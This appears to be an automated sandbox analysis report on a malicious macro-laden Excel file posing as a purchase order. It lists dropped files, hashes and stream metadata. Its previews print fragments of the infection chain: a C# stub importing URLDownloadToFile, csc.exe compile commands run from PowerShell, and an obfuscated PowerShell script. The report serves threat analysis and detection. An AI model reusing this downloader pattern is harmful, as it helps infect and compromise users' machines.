                                                  Preview:.... ...........................L...<...............0...........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...r.3.q.1.2.j.m.u...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e...r.3.q.1.2.j.m.u...d.l.l.....4.....P.r.o.d.u.c.t.V.e.r.s.i.o.n...0...0...0...0...8.....A.s.s.e.m.b.l.y. .V.e.r.s.i.o.n...0...0...0...0...
                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                  File Type:C++ source, Unicode text, UTF-8 (with BOM) text, with very long lines (348)
                                                  Category:dropped
                                                  Size (bytes):468
                                                  Entropy (8bit):3.816942936139208
                                                  Encrypted:false
                                                  SSDEEP:6:V/DsYLDS81zu840gElFVMmFnQXReKJ8SRHy4HttmDZf/5IOs1eYy:V/DTLDfu2fUXfHMRIOKeYy
                                                  MD5:8EC70363397A774E14B716C7EF51ABB6
                                                  SHA1:A966DB39ACEC786DE5A04960C81B9133EBE14F3E
                                                  SHA-256:2B3045FEB8ECAC01126519F49D1D27FC6D3CFF70140DA11BCC7CD0334671E5CE
                                                  SHA-512:04064F6B95DC606553C2723A2962BE61819E1D3BBEEC34F99089C28FA0F1CC8D1FAC10D0266BE29899C2AE55026E199500B49E8D1D7FCFF10F9A580DFAC9D916
                                                  Malicious:false
                                                  Preview:.using System;.using System.Runtime.InteropServices;..namespace RwUGrR.{. public class hWrdxmUaWg. {. [DllImport("UrLMoN", CharSet = CharSet.Unicode)]public static extern IntPtr URLDownloadToFile(IntPtr yjBGU,string fr,string DEq,uint nTGyTsAmGik,IntPtr KAFK);.. }..}.
                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                  File Type:Unicode text, UTF-8 (with BOM) text, with very long lines (366), with no line terminators
                                                  Category:dropped
                                                  Size (bytes):369
                                                  Entropy (8bit):5.294237009014045
                                                  Encrypted:false
                                                  SSDEEP:6:pAu+H2LvkuqJDdqxLTKbDdqB/6K2P23fHgtOtVH0zxs7+AEszIP23fHgtOthLBHn:p37Lvkmb6KzPCQt0WZEoPCQPn
                                                  MD5:B980D551FCEA2449DF8968EDF7681FDF
                                                  SHA1:FEB92AA3037285D793659D08C9C43FD2C0FC655B
                                                  SHA-256:6606BA7945849A9269B0038260B4FE82FACF9D4BA4182A2AC91086475FA1510B
                                                  SHA-512:29125ADF3DC8BA54653DEABB0EB0A17E33168BFF38596D48F3E8C1CD90DA46182D78AD2DE6221CFC5E2E9B0D995696A98049134B2CC8705824013E22CFB2E99C
                                                  Malicious:true
                                                  Preview:./t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\r3q12jmu\r3q12jmu.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\r3q12jmu\r3q12jmu.0.cs"
                                                  Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                  Category:dropped
                                                  Size (bytes):3072
                                                  Entropy (8bit):2.8247167245001634
                                                  Encrypted:false
                                                  SSDEEP:24:etGSVlWPBG5eM7p8amzkwlAU6LDtkZfOAt5qhkWI+ycuZhNzakSlPNnq:6P9sM+ayAU6mJdt5EH1ulza3/q
                                                  MD5:910E38E5170A66C359CCACCB50F1D718
                                                  SHA1:6ADEBE44182C846E04BF03A53E38BBCDFF02945E
                                                  SHA-256:9AD22285C50F5F20103241D802CC7C8334D258E04CD9FDC9203C75DD302F56A3
                                                  SHA-512:A92E11FA92F230D92DF78AF5CBC928B0E10BBFEA9965DAA3588F4789770C5E5FB85E65C1B0B643259334021D301850FA0EBDF12DE4FDB55A5AE961787580418F
                                                  Malicious:false
                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....RMg...........!.................#... ...@....... ....................................@.................................X#..S....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................#......H.......X ................................................................(....*BSJB............v4.0.30319......l.......#~..........#Strings............#US.........#GUID.......L...#Blob...........G.........%3............................................................9.2.....v.....v...........................".............. @.....P ......R.........X.....^.....a.....e.....q...R.....R...!.R.....R.......!.....*.......@.......................................)..........<Module>.r3
                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                  File Type:Unicode text, UTF-8 (with BOM) text, with very long lines (445), with CRLF, CR line terminators
                                                  Category:modified
                                                  Size (bytes):866
                                                  Entropy (8bit):5.369644379355019
                                                  Encrypted:false
                                                  SSDEEP:24:AId3ka6KzPXEoPaKaMD5DqBVKVrdFAMBJTH:Akka60/EoSKdDcVKdBJj
                                                  MD5:6A2D10E5FED4842C71A891840CB06ABA
                                                  SHA1:9A1BB1988F77776AEB22E612D79DA8407CA94A53
                                                  SHA-256:6F1ED043F904205D01C6B70FC1A0B72E41EBAFC08810F8A8471763B1837F5B04
                                                  SHA-512:C8259DE66F75FA2F963AA0365B19DAE2FF885E75D5DB6E091058B4183D157FBEF28E5C92E03D99F4090C6BD525499B4257D64CD614C34481A48ABE1C6D4AA283
                                                  Malicious:false
                                                  Preview:.C:\Windows\system32> "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\r3q12jmu\r3q12jmu.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\r3q12jmu\r3q12jmu.0.cs"......Microsoft (R) Visual C# Compiler version 4.8.3761.0...for C# 5..Copyright (C) Microsoft Corporation. All rights reserved.......This compiler is provided as part of the Microsoft (R) .NET Framework, but only supports language versions up to C# 5, which is no longer the latest version. For compilers that support newer versions of the C# programming language, see http://go.microsoft.com/fwlink/?LinkID=533240....
                                                  Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                  File Type:MSVC .res
                                                  Category:dropped
                                                  Size (bytes):652
                                                  Entropy (8bit):3.1339381716844
                                                  Encrypted:false
                                                  SSDEEP:12:DXt4Ii3ntuAHia5YA49aUGiqMZAiN5gryqUak7Ynqqh5PN5Dlq5J:+RI+ycuZhNAUakSh5PNnqX
                                                  MD5:8A1E884DBDEF442A124520F7E3674D36
                                                  SHA1:E63D8DC44C03279E61F7C178E4F9BAE97856B7CD
                                                  SHA-256:CFFDFAF9138B6A7E6BB12EFAD809F6795B2663E0F962BB6CE99353BC819902B5
                                                  SHA-512:FE554F7F072BC11E1C566E4E27463C1C0E913D2A1D553C43BBA9A10BBCB70FAA4178FC78178D70FECFA15277094602710D9E2C34893DB8A9224D9A665C5FD293
                                                  Malicious:false
                                                  Preview:.... ...........................L...<...............0...........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...x.m.q.w.3.5.t.j...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e...x.m.q.w.3.5.t.j...d.l.l.....4.....P.r.o.d.u.c.t.V.e.r.s.i.o.n...0...0...0...0...8.....A.s.s.e.m.b.l.y. .V.e.r.s.i.o.n...0...0...0...0...
                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                  File Type:C++ source, Unicode text, UTF-8 (with BOM) text, with very long lines (348)
                                                  Category:dropped
                                                  Size (bytes):468
                                                  Entropy (8bit):3.816942936139208
                                                  Encrypted:false
                                                  SSDEEP:6:V/DsYLDS81zu840gElFVMmFnQXReKJ8SRHy4HttmDZf/5IOs1eYy:V/DTLDfu2fUXfHMRIOKeYy
                                                  MD5:8EC70363397A774E14B716C7EF51ABB6
                                                  SHA1:A966DB39ACEC786DE5A04960C81B9133EBE14F3E
                                                  SHA-256:2B3045FEB8ECAC01126519F49D1D27FC6D3CFF70140DA11BCC7CD0334671E5CE
                                                  SHA-512:04064F6B95DC606553C2723A2962BE61819E1D3BBEEC34F99089C28FA0F1CC8D1FAC10D0266BE29899C2AE55026E199500B49E8D1D7FCFF10F9A580DFAC9D916
                                                  Malicious:false
                                                  Preview:.using System;.using System.Runtime.InteropServices;..namespace RwUGrR.{. public class hWrdxmUaWg. {. [DllImport("UrLMoN", CharSet = CharSet.Unicode)]public static extern IntPtr URLDownloadToFile(IntPtr yjBGU,string fr,string DEq,uint nTGyTsAmGik,IntPtr KAFK);.. }..}.
                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                  File Type:Unicode text, UTF-8 (with BOM) text, with very long lines (366), with no line terminators
                                                  Category:dropped
                                                  Size (bytes):369
                                                  Entropy (8bit):5.295300507340753
                                                  Encrypted:false
                                                  SSDEEP:6:pAu+H2LvkuqJDdqxLTKbDdqB/6K2P23fxyLzxs7+AEszIP23fxyFA:p37Lvkmb6Kz5yLWZEo5ym
                                                  MD5:AE4A769845E9CBDA5C6E135272EE0FAA
                                                  SHA1:9A55C4B69183095622DF365A76386443060F5021
                                                  SHA-256:613DAE582C4AFA35125E6A1626F46FBC511B8EAB798D1328D2F9E54B9CD0ECC8
                                                  SHA-512:DC0E523B5BAD065F3DC82451CE79F3D11E147A7F0038AB5116601FC3C04F28E92840B19B0461258BF34B8DC717AC759517179261BE742C1839DDDB9B015723CE
                                                  Malicious:false
                                                  Preview:./t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\xmqw35tj\xmqw35tj.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\xmqw35tj\xmqw35tj.0.cs"
                                                  Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                  Category:dropped
                                                  Size (bytes):3072
                                                  Entropy (8bit):2.8318090869619623
                                                  Encrypted:false
                                                  SSDEEP:24:etGSNNtlWPBG5eM7p8amzkwlAUuXLDtkZfbpwqhkWI+ycuZhNAUakSh5PNnq:679sM+ayAUuXmJbpwEH1ulAUa3h7q
                                                  MD5:F2C4893D72C567DEEA1832BC806496FD
                                                  SHA1:204B67D5B242FD52E1D2A2EEB3BDA815838FD0CF
                                                  SHA-256:A430788F22F62DCF42121845864F9FFAC99DBAAA4B24E00B747556A3F40B0965
                                                  SHA-512:6317E003650EA20473F5DF5F343F1898B8E3E82520A9828C895A52BB372A337F5723B89483E78760A3D2A19805CA12D3E592A10A54FACE5E6F3D9E62F0F68101
                                                  Malicious:false
                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....RMg...........!.................#... ...@....... ....................................@.................................X#..S....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................#......H.......X ................................................................(....*BSJB............v4.0.30319......l.......#~..........#Strings............#US.........#GUID.......L...#Blob...........G.........%3............................................................9.2.....v.....v...........................".............. @.....P ......R.........X.....^.....a.....e.....q...R.....R...!.R.....R.......!.....*.......@.......................................)..........<Module>.xm
                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                  File Type:Unicode text, UTF-8 (with BOM) text, with very long lines (445), with CRLF, CR line terminators
                                                  Category:modified
                                                  Size (bytes):866
                                                  Entropy (8bit):5.372511038622708
                                                  Encrypted:false
                                                  SSDEEP:24:AId3ka6Kz5yoEo5ynKaMD5DqBVKVrdFAMBJTH:Akka60HEoKKdDcVKdBJj
                                                  MD5:7CB7B28D4DEEA361925538543C3645DC
                                                  SHA1:D730AAD00985E691D4D8B43C8D3528004AD5CA81
                                                  SHA-256:45C0C81378299CCC36B4B8F9D20772F509823D2D1BDE415A9A0E4600534D4E33
                                                  SHA-512:AB4EC5654C7D4E51E8B325EB426FDE5174C487B366CE38A3FD390C2E6D0FB13A5AA30564C0A8BB65ADA33212AB6562019D4A51376E1F0980F752372141847D30
                                                  Malicious:false
                                                  Preview:.C:\Windows\system32> "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\xmqw35tj\xmqw35tj.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\xmqw35tj\xmqw35tj.0.cs"......Microsoft (R) Visual C# Compiler version 4.8.3761.0...for C# 5..Copyright (C) Microsoft Corporation. All rights reserved.......This compiler is provided as part of the Microsoft (R) .NET Framework, but only supports language versions up to C# 5, which is no longer the latest version. For compilers that support newer versions of the C# programming language, see http://go.microsoft.com/fwlink/?LinkID=533240....
                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                  File Type:very short file (no magic)
                                                  Category:dropped
                                                  Size (bytes):1
                                                  Entropy (8bit):0.0
                                                  Encrypted:false
                                                  SSDEEP:3:U:U
                                                  MD5:C4CA4238A0B923820DCC509A6F75849B
                                                  SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                  SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                  SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                  Malicious:false
                                                  Preview:1
                                                  Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):512
                                                  Entropy (8bit):0.0
                                                  Encrypted:false
                                                  SSDEEP:3::
                                                  MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                                  SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                                  SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                                                  SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                                  Malicious:false
                                                  Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):512
                                                  Entropy (8bit):0.0
                                                  Encrypted:false
                                                  SSDEEP:3::
                                                  MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                                  SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                                  SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                                                  SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                                  Malicious:false
                                                  Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):512
                                                  Entropy (8bit):0.0
                                                  Encrypted:false
                                                  SSDEEP:3::
                                                  MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                                  SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                                  SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                                                  SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                                  Malicious:false
                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                  File Type:Unicode text, UTF-16, little-endian text, with very long lines (3453), with CRLF line terminators
                                                  Category:dropped
                                                  Size (bytes):154384
                                                  Entropy (8bit):3.8033508297517873
                                                  Encrypted:false
                                                  SSDEEP:3072:ECFOB9LjxbTAKZGEDqmCFOB9LjxbTAKZGEDMCFOB9LjxbTAKZGEDP:EcoBWKZGEDqmcoBWKZGEDMcoBWKZGEDP
                                                  MD5:297E6244E9EDCAEB8B1F6705E40CB51D
                                                  SHA1:230882871D7FF55237292422E02EEF841CF5F21E
                                                  SHA-256:9CCE8E2B2E0A7512420E3C93DEC3B33DB128D7FD694F6FC9AE1C8C9FF9817365
                                                  SHA-512:F722D14668F8B75AB7B2DB08FF3A2D2B85007C8902E213B094C24DB2694E785AFF8D41F0117E18414E4807AA30BA2A57C01C16186B046B23C64E7F4320D972AE
                                                  Malicious:true
                                                  Preview:...... . . . .....Q.k.i.x.m.W.O.c.e.K.O.z.a.U.i. .=. .".j.W.W.L.N.q.L.L.Z.S.T.j.J.n.h.".....h.N.L.W.d.i.k.L.k.j.U.p.e.P.K. .=. .".P.C.l.a.h.f.W.L.d.z.c.G.L.O.h.".....e.a.q.A.q.s.K.W.K.W.i.e.m.h.C. .=. .".o.L.s.O.k.N.A.t.k.L.N.p.g.u.I.".........q.P.d.P.P.Q.m.t.x.W.B.R.o.L.W. .=. .".W.f.B.z.R.l.Z.c.W.U.N.S.A.i.q.".....T.U.c.N.i.e.L.t.U.L.z.B.i.O.A. .=. .".p.h.L.N.m.i.b.O.N.t.o.e.U.Z.P.".....B.W.n.L.t.A.u.b.L.W.u.f.c.a.G. .=. .".L.c.U.n.h.L.o.k.n.L.L.Z.G.o.T.".....N.J.z.W.W.Z.f.x.L.N.W.a.Z.h.A. .=. .".p.G.N.p.G.C.f.t.H.L.e.h.L.K.p.".....c.e.h.l.P.Q.P.t.k.z.S.Z.k.A.e. .=. .".B.K.N.i.i.K.U.q.c.W.m.B.i.e.c.".....b.k.o.v.K.L.h.K.A.P.W.K.L.K.U. .=. .".l.i.G.l.d.C.f.W.B.c.e.c.c.h.z.".....U.A.u.u.B.g.s.R.L.S.Q.G.Q.L.H. .=. .".P.W.L.k.f.K.h.h.W.A.W.g.L.L.Z.".....u.W.k.e.i.W.i.U.K.L.h.l.W.k.q. .=. .".L.W.o.T.K.B.L.Q.L.o.b.c.x.a.G.".....K.p.m.p.K.L.L.m.i.e.c.i.v.L.L. .=. .".Z.L.K.O.q.k.f.h.u.e.L.B.Z.Q.L.".....O.N.k.C.f.h.N.W.G.u.W.e.L.W.T. .=. .".k.W.N.f.p.z.L.t.O.K.v.l.L.e.C.".....d.K.k.t.U.U.G.U.
                                                  Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                  File Type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1252, Name of Creating Application: Microsoft Excel, Create Time/Date: Sat Sep 16 01:00:00 2006, Last Saved Time/Date: Mon Dec 2 06:24:53 2024, Security: 1
                                                  Category:dropped
                                                  Size (bytes):988160
                                                  Entropy (8bit):7.757867987862203
                                                  Encrypted:false
                                                  SSDEEP:12288:/SmzHJEUiOIBUzMTS7D3DERnLRmF8DhEPWxpsAQx1Zj+jYEPO5X79mP8sTm+WDF9:tBaybARM8Aw8Z+jPOp79mQTFqja
                                                  MD5:A45CF6FD74DC6D289240651822BFBACA
                                                  SHA1:646BFA8A27C92ACF95A74E56383125BBF43FFFC8
                                                  SHA-256:2170DE0D94AEEEFA0D82131F4EA9588998B0296D53D9891C0D4CA5A14BBB7F52
                                                  SHA-512:5A4D62F599CD68E5F3E19D46174E9EF9BB64456C066727D30613FCD9ADB0A0138E30365B5933C662BC44E8CF63D5DCDD5C55E3395F3BFB72245A7FB35CAD40C6
                                                  Malicious:false
                                                  Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                  File Type:ASCII text, with CRLF line terminators
                                                  Category:dropped
                                                  Size (bytes):26
                                                  Entropy (8bit):3.95006375643621
                                                  Encrypted:false
                                                  SSDEEP:3:ggPYV:rPYV
                                                  MD5:187F488E27DB4AF347237FE461A079AD
                                                  SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                  SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                  SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                  Malicious:false
                                                  Preview:[ZoneTransfer]....ZoneId=0
                                                  Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                  File Type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1252, Name of Creating Application: Microsoft Excel, Create Time/Date: Sat Sep 16 01:00:00 2006, Last Saved Time/Date: Mon Dec 2 06:24:53 2024, Security: 1
                                                  Category:dropped
                                                  Size (bytes):988160
                                                  Entropy (8bit):7.757867987862203
                                                  Encrypted:false
                                                  SSDEEP:12288:/SmzHJEUiOIBUzMTS7D3DERnLRmF8DhEPWxpsAQx1Zj+jYEPO5X79mP8sTm+WDF9:tBaybARM8Aw8Z+jPOp79mQTFqja
                                                  MD5:A45CF6FD74DC6D289240651822BFBACA
                                                  SHA1:646BFA8A27C92ACF95A74E56383125BBF43FFFC8
                                                  SHA-256:2170DE0D94AEEEFA0D82131F4EA9588998B0296D53D9891C0D4CA5A14BBB7F52
                                                  SHA-512:5A4D62F599CD68E5F3E19D46174E9EF9BB64456C066727D30613FCD9ADB0A0138E30365B5933C662BC44E8CF63D5DCDD5C55E3395F3BFB72245A7FB35CAD40C6
                                                  Malicious:true
                                                  File type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.2, Code page: 1252, Name of Creating Application: Microsoft Excel, Create Time/Date: Sat Sep 16 01:00:00 2006, Last Saved Time/Date: Mon Dec 2 02:20:48 2024, Security: 1
                                                  Entropy (8bit):7.758468903603302
                                                  TrID:
                                                  • Microsoft Excel sheet (30009/1) 47.99%
                                                  • Microsoft Excel sheet (alternate) (24509/1) 39.20%
                                                  • Generic OLE2 / Multistream Compound File (8008/1) 12.81%
                                                  File name:PO#BBGR2411PO69.xls
                                                  File size:987'136 bytes
                                                  MD5:ff6ca372d80251aeadd10122ac4d46c0
                                                  SHA1:26543f78c7c1bfad35c0e3e2acb9d5972cbd1257
                                                  SHA256:8bd6a8555939af5f504e3bcadfa876e1447cadbcbd163b340cd784cafd4dfd8c
                                                  SHA512:bbe2db5915709cb355207b5f73356cd6c5b451039e19e54911e1b6d09bf29ca9f39c7d18f991681d6993be7324095071586b4c5a63b970998d983ccf21b3de0d
                                                  SSDEEP:12288:GSmzHJEUiOIBUzMTSLD3DERnLRmF8DhEPGxpsAQx1Zj+jgEPBqAZFsOYjPxRdoy7:GBaibARM8Ag8Z+jHoRPlx
                                                  TLSH:6525F1D2B68DAB12CA55123535F387AE2724AC53D912467B23F8B3192FF76C08543F86
                                                  Icon Hash:276ea3a6a6b7bfbf
                                                  Document Type:OLE
                                                  Number of OLE Files:1
                                                  Has Summary Info:
                                                  Application Name:Microsoft Excel
                                                  Encrypted Document:True
                                                  Contains Word Document Stream:False
                                                  Contains Workbook/Book Stream:True
                                                  Contains PowerPoint Document Stream:False
                                                  Contains Visio Document Stream:False
                                                  Contains ObjectPool Stream:False
                                                  Flash Objects Count:0
                                                  Contains VBA Macros:True
                                                  Code Page:1252
                                                  Author:
                                                  Last Saved By:
                                                  Create Time:2006-09-16 00:00:00
                                                  Last Saved Time:2024-12-02 02:20:48
                                                  Creating Application:Microsoft Excel
                                                  Security:1
                                                  Document Code Page:1252
                                                  Thumbnail Scaling Desired:False
                                                  Contains Dirty Links:False
                                                  Shared Document:False
                                                  Changed Hyperlinks:False
                                                  Application Version:786432
                                                  General
                                                  Stream Path:MBD007009DB/MBD007203CB/_VBA_PROJECT_CUR/VBA/Sheet1
                                                  VBA File Name:Sheet1.cls
                                                  Stream Size:977
                                                  Attribute VB_Name = "Sheet1"
                                                  Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
                                                  Attribute VB_GlobalNameSpace = False
                                                  Attribute VB_Creatable = False
                                                  Attribute VB_PredeclaredId = True
                                                  Attribute VB_Exposed = True
                                                  Attribute VB_TemplateDerived = False
                                                  Attribute VB_Customizable = True
                                                  

                                                  General
                                                  Stream Path:MBD007009DB/MBD007203CB/_VBA_PROJECT_CUR/VBA/Sheet2
                                                  VBA File Name:Sheet2.cls
                                                  Stream Size:977
                                                  Attribute VB_Name = "Sheet2"
                                                  Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
                                                  Attribute VB_GlobalNameSpace = False
                                                  Attribute VB_Creatable = False
                                                  Attribute VB_PredeclaredId = True
                                                  Attribute VB_Exposed = True
                                                  Attribute VB_TemplateDerived = False
                                                  Attribute VB_Customizable = True
                                                  

                                                  General
                                                  Stream Path:MBD007009DB/MBD007203CB/_VBA_PROJECT_CUR/VBA/ThisWorkbook
                                                  VBA File Name:ThisWorkbook.cls
                                                  Stream Size:985
                                                  Attribute VB_Name = "ThisWorkbook"
                                                  Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
                                                  Attribute VB_GlobalNameSpace = False
                                                  Attribute VB_Creatable = False
                                                  Attribute VB_PredeclaredId = True
                                                  Attribute VB_Exposed = True
                                                  Attribute VB_TemplateDerived = False
                                                  Attribute VB_Customizable = True
                                                  

                                                  General
                                                  Stream Path:\x1CompObj
                                                  CLSID:
                                                  File Type:data
                                                  Stream Size:114
                                                  Entropy:4.25248375192737
                                                  Base64 Encoded:True
                                                  General
                                                  Stream Path:\x5DocumentSummaryInformation
                                                  CLSID:
                                                  File Type:data
                                                  Stream Size:244
                                                  Entropy:2.889430592781307
                                                  Base64 Encoded:False
                                                  General
                                                  Stream Path:\x5SummaryInformation
                                                  CLSID:
                                                  File Type:data
                                                  Stream Size:200
                                                  Entropy:3.2341247550157988
                                                  Base64 Encoded:False
                                                  General
                                                  Stream Path:MBD007009DB/\x1CompObj
                                                  CLSID:
                                                  File Type:data
                                                  Stream Size:114
                                                  Entropy:4.25248375192737
                                                  Base64 Encoded:True
                                                  General
                                                  Stream Path:MBD007009DB/\x5DocumentSummaryInformation
                                                  CLSID:
                                                  File Type:data
                                                  Stream Size:244
                                                  Entropy:2.701136490257069
                                                  Base64 Encoded:False
                                                  General
                                                  Stream Path:MBD007009DB/\x5SummaryInformation
                                                  CLSID:
                                                  File Type:data
                                                  Stream Size:220
                                                  Entropy:3.372234242231489
                                                  Base64 Encoded:False
                                                  General
                                                  Stream Path:MBD007009DB/MBD0018D4CE/\x1Ole
                                                  CLSID:
                                                  File Type:data
                                                  Stream Size:20
                                                  Entropy:0.5689955935892812
                                                  Base64 Encoded:False
                                                  Data ASCII:. . . . . . . . . . . . . . . . . . . .
                                                  Data Raw:01 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                  General
                                                  Stream Path:MBD007009DB/MBD0018D4CE/\x3ObjInfo
                                                  CLSID:
                                                  File Type:data
                                                  Stream Size:4
                                                  Entropy:0.8112781244591328
                                                  Base64 Encoded:False
                                                  Data ASCII:. . . .
                                                  Data Raw:00 00 03 00
                                                  General
                                                  Stream Path:MBD007009DB/MBD0018D4CE/Contents
                                                  CLSID:
                                                  File Type:Corel Photo-Paint image, version 9, 716 x 547 RGB 24 bits, 11811024 micro dots/mm, 4 blocks, array offset 0x13c
                                                  Stream Size:197671
                                                  Entropy:6.989042939766534
                                                  Base64 Encoded:True
                                                  General
                                                  Stream Path:MBD007009DB/MBD0068D442/\x1CompObj
                                                  CLSID:
                                                  File Type:data
                                                  Stream Size:114
                                                  Entropy:4.219515110876372
                                                  Base64 Encoded:False
                                                  General
                                                  Stream Path:MBD007009DB/MBD0068D442/Package
                                                  CLSID:
                                                  File Type:Microsoft Excel 2007+
                                                  Stream Size:26243
                                                  Entropy:7.635433729726103
                                                  Base64 Encoded:True
                                                  General
                                                  Stream Path:MBD007009DB/MBD007203CB/\x1CompObj
                                                  CLSID:
                                                  File Type:data
                                                  Stream Size:114
                                                  Entropy:4.25248375192737
                                                  Base64 Encoded:True
                                                  General
                                                  Stream Path:MBD007009DB/MBD007203CB/\x5DocumentSummaryInformation
                                                  CLSID:
                                                  File Type:data
                                                  Stream Size:248
                                                  Entropy:3.0523231150355867
                                                  Base64 Encoded:False
                                                  General
                                                  Stream Path:MBD007009DB/MBD007203CB/\x5SummaryInformation
                                                  CLSID:
                                                  File Type:data
                                                  Stream Size:256
